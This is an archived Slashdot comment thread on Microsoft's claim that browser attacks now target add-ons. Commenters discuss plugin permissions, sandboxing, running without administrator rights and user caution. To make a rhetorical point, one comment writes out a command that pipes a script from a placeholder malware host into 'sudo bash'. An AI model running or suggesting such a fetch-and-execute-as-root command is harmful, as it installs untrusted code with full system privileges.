Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
Internet Explorer The Internet Security

Microsoft Blames Add-Ons For Browser Woes 307

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"
This discussion has been archived. No new comments can be posted.

Microsoft Blames Add-Ons For Browser Woes

Comments Filter:
  • Duh (Score:5, Insightful)

    by Drinking Bleach ( 975757 ) on Friday November 21, 2008 @04:01PM (#25850749)

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  • by retech ( 1228598 ) on Friday November 21, 2008 @04:01PM (#25850759)
    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.
    • by stewbacca ( 1033764 ) on Friday November 21, 2008 @04:09PM (#25850915)
      You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.
    • Re: (Score:2, Insightful)

      by Kamokazi ( 1080091 )

      To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):

      -I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.

      -IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browse

      • by Anders ( 395 ) on Friday November 21, 2008 @05:47PM (#25852417)

        (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

        Much more needed is "-1, Reverse psychology"

        (runner-up is "+1, your uid is prime")

      • by nine-times ( 778537 ) <nine.times@gmail.com> on Friday November 21, 2008 @07:17PM (#25853535) Homepage

        IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.

        Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart."

        So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed in in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent.

        But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away.

      • Re: (Score:3, Informative)

        by BenoitRen ( 998927 )

        definately

        Definitely. Definitely!

        IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3.

        The Acid tests are not an indicator of standards compliance. They're tests of flaws in web browsers that web developers want fixed. KHTML may have passed Acid2 first, but it had a lot of rendering flaws. When Gecko didn't pass Acid2, it had less flaws and was more standards compliant overall.

        Bloated? How? I really don't see any bloat compared to other b

  • Permissions (Score:5, Insightful)

    by gurps_npc ( 621217 ) on Friday November 21, 2008 @04:02PM (#25850773) Homepage
    And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.
    • Re:Permissions (Score:5, Interesting)

      by TheRaven64 ( 641858 ) on Friday November 21, 2008 @04:07PM (#25850861) Journal
      Ideally, most of these plugins should be setuid as nobody, run in a separate process and have their windows reparented into the browser window. I don't know of any *NIX systems that actually do this for plugins. I believe Chrome does something similar on Windows, but IE does not (although it runs the entire browser as a less-privileged process on Vista).
      • Re:Permissions (Score:5, Informative)

        by Anonymous Coward on Friday November 21, 2008 @04:21PM (#25851129)

        Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.

        • Re: (Score:2, Informative)

          by ShawnCplus ( 1083617 )
          That's gotta be new. Every time I've gotten within 100 yards of a site with flash Konquerer crashed.
        • by mangu ( 126918 ) on Friday November 21, 2008 @04:59PM (#25851747)

          There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.

          You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.

        • Konqueror runs flash elements and java applets

          Except when it doesn't.

      • Re:Permissions (Score:5, Insightful)

        by SanityInAnarchy ( 655584 ) <ninja@slaphack.com> on Saturday November 22, 2008 @02:54AM (#25856115) Journal

        Just in case anyone was going to interpret this literally:

        Ideally, most of these plugins should be setuid as nobody

        No, no, a thousand times no!

        I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.

        These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.

        The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.

        In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.

        But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!

    • Re:Permissions (Score:5, Insightful)

      by geirnord ( 150896 ) on Friday November 21, 2008 @04:07PM (#25850863)

      I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

      • Re: (Score:3, Informative)

        by soniCron88 ( 870042 )

        Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

        Was there a time when plug-ins couldn't have access to the harddrive?

    • Re:Permissions (Score:5, Interesting)

      by ya really ( 1257084 ) on Friday November 21, 2008 @04:29PM (#25851259)

      IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?

      • Re:Permissions (Score:5, Interesting)

        by gurps_npc ( 621217 ) on Friday November 21, 2008 @04:48PM (#25851567) Homepage
        Because they made it easy to write shoddy code. If you make people go through hoops to get the good stuff, then they get lazy and accept the minimum. To use a real world analogy, no, you don't need to have the same key start the car as open your front door, your mail box, and your office. If you insist on selling a car, house lock, mailbox and the office, then don't also make them use the same key for 'convience'.
      • Re:Permissions (Score:5, Interesting)

        by catchblue22 ( 1004569 ) on Friday November 21, 2008 @05:06PM (#25851837) Homepage

        IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?

        Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly.

        I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.

        • Re: (Score:3, Interesting)

          by Vancorps ( 746090 )

          What everyday task does Vista bug you about authorizing?

          I've heard this a number of times how it nags people and that the initial release was rough but since SP1 I only see allow or deny when its something I'm doing intentionally that administrative related like installing an update to a program.

          I'm genuinely interested in this since I manage a lot of Windows machines and sooner or later I'll have to deal with common complaints or face turning UAC off.

          • Re:Permissions (Score:4, Interesting)

            by Lucky75 ( 1265142 ) on Friday November 21, 2008 @05:52PM (#25852479)
            Renaming a file (extension) under program files, for example, prompts you 3x if your sure. I think we could do without the multitude of prompts.

            Are you sure?
            Are you really sure?
            Positive?
            Ok
      • If Microsoft puts out an OS which allows people to write third party software for it, don't they have some obligation to make sure their OS can't be compromised by third parties?

        • They would be one of very few operating systems if that were the case. ATI drivers here on Ubuntu cause lock-ups all the time, sometimes I can't even ctrl+alt+backspace to restart X.

          In short, people are idiots and it is up to developer and administrators to do their jobs properly. All the issues out there are as results of lazy programmers or administrators or both.

      • Re:Permissions (Score:4, Insightful)

        by legirons ( 809082 ) on Friday November 21, 2008 @05:43PM (#25852349)

        IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.

        Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)

        Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)

      • Re:Permissions (Score:5, Interesting)

        by CodeBuster ( 516420 ) on Friday November 21, 2008 @06:13PM (#25852785)

        can they really be blamed for shoddy coding done by third parties?

        Yes they can and here is why:

        If a program is going to allow addons then the communications between the addons and the main application should be conducted entirely through interfaces [microsoft.com] in order to preserve abstraction and enforce Design by Contract [wikipedia.org] principles. In this way addons are allowed to plug into the application at precise locations controlled by the main application and to interact with the main application abstractly and in precisely defined and limited ways. Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well designed interface contracts can support a wealth of valuable features while maintaining plug-ability and abstraction throughout the software stack. So I don't buy "It's the addons fault" since the addons, ultimately, can only do things which the main application framework has allowed them to do whether intentionally, through good abstraction, or unintentionally from poor addon framework design.

      • Re: (Score:3, Informative)

        >IE7 is set to run in sandbox mode by default.

        I believe this is only on Vista.

    • Microsoft creates the environment in which these add-ons run. If that environment is too permissive, allowing add-ons to reach deep into your system, then this is still microsoft's fault. They should only allow the add-ons to play in a very small sandbox with high walls.

  • by bigstrat2003 ( 1058574 ) * on Friday November 21, 2008 @04:02PM (#25850775)

    The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

    This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

    • Re: (Score:3, Informative)

      by Anonymous Coward
      And if your browser isn't full of security holes, it doesn't matter which sites you go to.

      I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.
      • Re: (Score:3, Insightful)

        by SQLGuru ( 980662 )

        How about a car analogy?

        If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.

        Layne

      • by bigstrat2003 ( 1058574 ) * on Friday November 21, 2008 @04:41PM (#25851461)

        This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.

        Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.

        Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.

        And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.

        • by Anonymous Coward on Friday November 21, 2008 @04:57PM (#25851695)

          I like the sex analogies; I think this should be a new standard for /.

          Yours has some good points but:

          Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.

          Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?

          • Re: (Score:3, Funny)

            by Bargeld ( 621917 )

            >>I like the sex analogies; I think this should be a new standard for /.

            Nonstarter. Reader-base is unfamiliar with the interface.

            Back to car analogies please.

            --Bargeld

        • Except that large numbers of people don't go around stealth-infecting people on purpose to infect others.

          With automated botnets scanning and attacking your legitimate sites are getting exploited Large scale sql insertion attack [computerworld.com].

          You could use something like siteadvisor.com [siteadvisor.com] to help protect yourself, if you aren't afraid of using something owned by McAfee. It doesn't catch exploited sites instantaneously, but it helps you on the user training front by marking large swatch of the internet as unsafe. It
        • Using the internet with a secure browser is like having sex with a condom.

          Actually, it's more like a stack of one-dollar bills the size of a football field inside the Library of Congress in the shape of a car.

    • I agree completely. My antivirus program says everything is fine, and so does my spyware killer. The only thing I can't quite figure out is that since I started on-line banking, it doesn't matter how much money I put in my account, the balance won't go above $5,000. :)

    • ... and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

      How do you know?

      • Because after he got his virus, he became afraid of the internet and didn't visit any sites up until Chromes recent release.

        Welcome to the internet, I'll show you around.
      • Because I monitor my computer's behavior and health? I'm not a babe-in-the-woods clueless user, here, I keep an eye on how my PC is doing. It's technically possible that I could have got some sort of invisible, undetectable malware, but if we take it to that level of ridiculosity, then no one knows if their computer is clean.
    • by Sloppy ( 14984 ) on Friday November 21, 2008 @04:37PM (#25851393) Homepage Journal

      The biggest part of internet security is paying attention to where you go.

      I would agree with you, if "going" to a malware site meant

      curl ftp://malwaresite.com/malware.sh [malwaresite.com] | sudo bash

      Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

      "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

    • Re: (Score:2, Insightful)

      by joeflies ( 529536 )

      I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent somone from taking over your machine.

      You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting

    • by Smauler ( 915644 )

      Meh - I go to all kinds of dodgy sites, and have yet to have a virus. Obviously I get a few warnings, Firefox warns me about some stuff, and I never ever actually run anything from a source I don't trust. My personal opinion is that most people get viruses from emails their friends have sent them, which they click yes to. Vista's UAC is actually pretty useful for me. It rarely pops up when I'm doing normal stuff, and it does stop stuff from running as admin. I used to have antivirus on this box, but I

    • if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

      All men have two heads, but they can only think with one of them at a time. Now, if you're indulging in some "one-handed browsing," how secure your browser is may well be a factor in keeping your computer clean because sites like that are prime grazing ground for malware and trojans and spyware, Oh my!

    • You are assuming that valid sites you visit haven't been compromised so that they install malware, or that your upstream DNS didn't get hijacked.

      If your browser isn't secure eventually you will end up with problems no matter what sort of sites you visit. This particular article is just Microsoft trying to side-step the fact that something as simple as switching your browser from IE to something else can reduce your risk substantially.

  • But remember (Score:5, Insightful)

    by dedazo ( 737510 ) on Friday November 21, 2008 @04:03PM (#25850789) Journal

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

    • Re: (Score:2, Insightful)

      by xant ( 99438 )

      I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser.

      They were able to fix it to some degree, but all it's doing is preventing poorly-written addons from leaking memory. I think protecting the user from his addons is a superior technical solution, but it isn't Firefox's "fault" that the addons were written poorly.

      And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing pro

  • Around here, and many other places, I suspect, the generally-accepted practice is to first blame the network when problems arise.

    The network usually isn't at fault but we are still forced to jump through hoops before we can tell the user the network is fine, it's their poorly-implemented config/script/filter that caused their problems.

    I see this as a similar practice... if some crap comes through the browser, it must be the browser's fault. Nevermind that some toolbar or plugin or other enhacement left a

    • Love it when users try to blame their flaky network connections for files getting deleted. They certainly didn't delete the wrong file, their network connection is glitchy and "goes down" all the time, they tell me on their IP phone....

    • I thought the generally accepted practice for MS is to first blame the video driver, and then blame the printer driver. *then* they might look at the problem :)

      Mind you, I agree with MS here, the biggest problem with the browser is the add-ins.. ones like SmileyCentral, AdsULike, PhishingToolbar, AntiVirusCheckPro, and NoSpamHonestNoReally.

  • by syousef ( 465911 ) on Friday November 21, 2008 @04:09PM (#25850899) Journal

    Many non-power-users don't use addons at all.

    If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

    • by EvanED ( 569694 ) <evaned@g[ ]l.com ['mai' in gap]> on Friday November 21, 2008 @04:12PM (#25850975)

      Many non-power-users don't use addons at all.

      And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

    • by athakur999 ( 44340 ) on Friday November 21, 2008 @04:14PM (#25851019) Journal

      Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

      If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

    • yeah, bullshit is right- bullshit power users don't use add-ons; look at the examples given in the article and the summary- flash, pdf, and quicktime? unless you categorize all the youtube users as 'techies', eh?

    • I'm going to remember that next time I have to fix someone's computer and IE has 10 bullshit toolbars, of which 9 of them are malware.

    • by mcgrew ( 92797 ) *

      From TFA: The browser is becoming a harder target and there are many more browsers," Lawrence said. "So attackers are targeting add-onsaling from the poor to give to the rich.

      But your IE add-on worn't work in Firefox and the Firefox add-on won't work on Opera. How stupid do these people think we are?

      He added that attackers are finding add-ons with high market share looking for vulnerabilities and then exploiting every browser through the add-on

      Again, that's neither logical nor reasonable. Can anyone point t

      • Re: (Score:3, Interesting)

        by TheRaven64 ( 641858 )

        Can anyone point to an add-on that has more users than ANY brand of browser?

        Sun Java? Adobe Flash? Not sure about the former does, but the latter has a much bigger installed-base than IE.

    • Re: (Score:2, Informative)

      Many non-power-users don't use addons at all.

      That's incorrect. Most of them install the add-ons without really knowing that they are doing, or don't unchecked the box that says "Install this tool bar you don't want" when installing software.

    • Many non-power-users don't use addons at all.

      Everybody (well, almost of course) has flash installed nowadays.

    • by wizkid ( 13692 )

      I'm a power user, and I use add-ons ... Especially noscript. It's really helpful on IE... No wait ... Nevermind on the IE part. I haven't used wine to load IE yet.

    • Re: (Score:3, Informative)

      by clodney ( 778910 )

      I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc.

      Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed.

    • Re: (Score:3, Interesting)

      Many non-power-users don't use addons at all.

      If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

      Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets.

  • Tied down! (Score:2, Insightful)

    by Anonymous Coward

    It's browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!

  • by Anonymous Coward on Friday November 21, 2008 @04:13PM (#25850985)

    With the likes of ActiveX, and Silverlight out there, who could blame IE?

  • by Anonymous Coward on Friday November 21, 2008 @04:17PM (#25851057)

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  • Plugin model (Score:5, Insightful)

    by Enderandrew ( 866215 ) <enderandrew@gmSTRAWail.com minus berry> on Friday November 21, 2008 @04:25PM (#25851197) Homepage Journal

    Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?

    Take a look at how Chrome handles plugins and then try to pass the buck.

    • Re:Plugin model (Score:4, Informative)

      by benjymouse ( 756774 ) on Friday November 21, 2008 @05:15PM (#25851959)

      Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc.

      Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.

      If a plugin needs more advanced access than what is provided by his broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability)which enabled a security researcher to execute a program on the Vista in the pwn2own contest.

      Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adament that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.

    • Re: (Score:2, Interesting)

      by Anonymous Coward

      Yes, they are responsible for the plug-in architecture. However, the architecture only provides the mechanism through which the plug-ins are loaded and communicate with the browser, they don't provide any further facility. The plug-ins are simply binaries which are loaded into the process space of the browser. The browser process dictates the security context under which the plug-in will execute. In all browsers on all platforms if the plug-in has a vulnerability exploiting that vulnerability gains the

  • (Sorry... can't find the video; SNL's crackin' down, I guess. All I got is some transcript [jt.org].)
  • After what was expected to be an unusually quiet Patch Tuesday, Microsoft has released eight patches for applications with an insufficient number of security holes [today.com].

    The updates include "critical" patches to Windows Media Player visualisations, Zune player software, that really cute dinosaur cursor and Age Of Empires II. The exploits opened by these patches allow a malicious user to take webcam pictures of your pimply butt, steal your pizza delivery and have sex with your girlfriend. The exploits have alrea

  • by betelgeuse68 ( 230611 ) on Friday November 21, 2008 @04:55PM (#25851661)

    Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as as "root"!!! ("administrator" in the Windows vernacular)

    I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:

    http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515

    The installer will create shortcuts for IE and Fifrefox but if you look carefully it's really a program with the browser .EXE passed as an argument.

    Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.

    This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.

    (Some caveats)

    This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).

    If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpate.

    And finally, to convince yourself the utility does something useful. Go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).

    Maybe I'll educate some % of the IT world yet...

    Respectfully,
    -M


  • How about sandboxing the entire thing so that no matter what, with the flip of a switch, no writes to the HD are allowed, period (cookies or otherwise, I don't care to be tracked, and can remember more than one complex password). We could call it something scary, like jail. Or chroot jail.

    Think about it, next generation. I've given up on the current one.
  • ABM (Score:3, Insightful)

    by YetAnotherBob ( 988800 ) on Friday November 21, 2008 @05:08PM (#25851865)

    This is marking. Blame ABM, Anybody But Microsoft.

    Truth is that IE is not the best browser, but is better than it was.

    Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.

    Why is any of this news? It is really just a marketing departments attemt to deflect blame away from where it belongs.

  • It's quite simple. You/They/We can define a very simple interface that displays some stuff and allows a few simple user inputs and maybe after a few years of debugging we might have a reliable browser suitable for basic stuff -- including financial data transfers and buying and selling stuff.

    Or we can continue to try to do everything in the world in our browsers and then act really surprised when our PC starts relaying 20 thousand spam messages a day or our money and/or data and/or identity ends up in Lich

  • I installed Windows Vista on my Mac Pro in order to run the one program I wanted that I couldn't get for Mac OS the other day (Fallout 3) and while waiting for the install to finish I viewed a few web pages. I'm not talking about pornindex2000.ru here, however it wasn't cnet, either. On a scale of amish to thai hooker I was in solid girl in high school who smoked out back territory.

    In any case, I didn't really care what sort of virus or malware or autodialer or rootkit or killprog or hypnotoad I picked u
  • by Luscious868 ( 679143 ) on Friday November 21, 2008 @05:27PM (#25852137)

    'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said.

    And if you believe that I've got this great piece of land I'd like to sell you.

  • by BlueParrot ( 965239 ) on Friday November 21, 2008 @05:28PM (#25852153)

    Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.

  • by VGPowerlord ( 621254 ) on Friday November 21, 2008 @06:03PM (#25852667)

    Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever?

  • by Jeff Moss ( 1413027 ) on Friday November 21, 2008 @07:36PM (#25853747)

    Quick note: This article is a spin off of what Eric had to say during the most recent Black Hat Webcast, where Jeremiah Grossman was talking about clickjacking and other related browser issues. Eric made a lot of sense talking about plug ins and addons being the cross platform low hanging fruit.

    Listen and watch the webinar to hear what he had to say and keep everything in context:
    http://w.on24.com/r.htm?e=122494&s=1&k=05ED21C1734D531D2D84CA56F4ADB0F2 [on24.com]

    Or download the .m4b audio file when we get it online next week here:
    https://www.blackhat.com/html/webinars/webinars-index.html [blackhat.com]

You are always doing something marginal when the boss drops by your desk.

Working...